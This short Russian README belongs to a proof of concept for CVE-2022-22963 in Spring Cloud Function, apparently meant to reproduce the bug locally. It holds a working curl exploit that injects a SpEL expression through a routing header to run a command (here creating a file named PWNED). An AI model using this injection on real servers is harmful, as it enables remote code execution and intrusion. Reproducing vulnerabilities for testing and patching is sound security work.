
Минимальное доказательство концепции для CVE-2022-22963 удаленного выполнения кода в Spring Cloud Function через внедрение SpEL. Демонстрирует эксплуатацию с помощью curl на уязвимом сервере.
Минимальный пример для воспроизведения удаленного выполнения кода CVE-2022-22963 в org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
В результате эксплуатации файл PWNED будет создан рядом с pom.xml.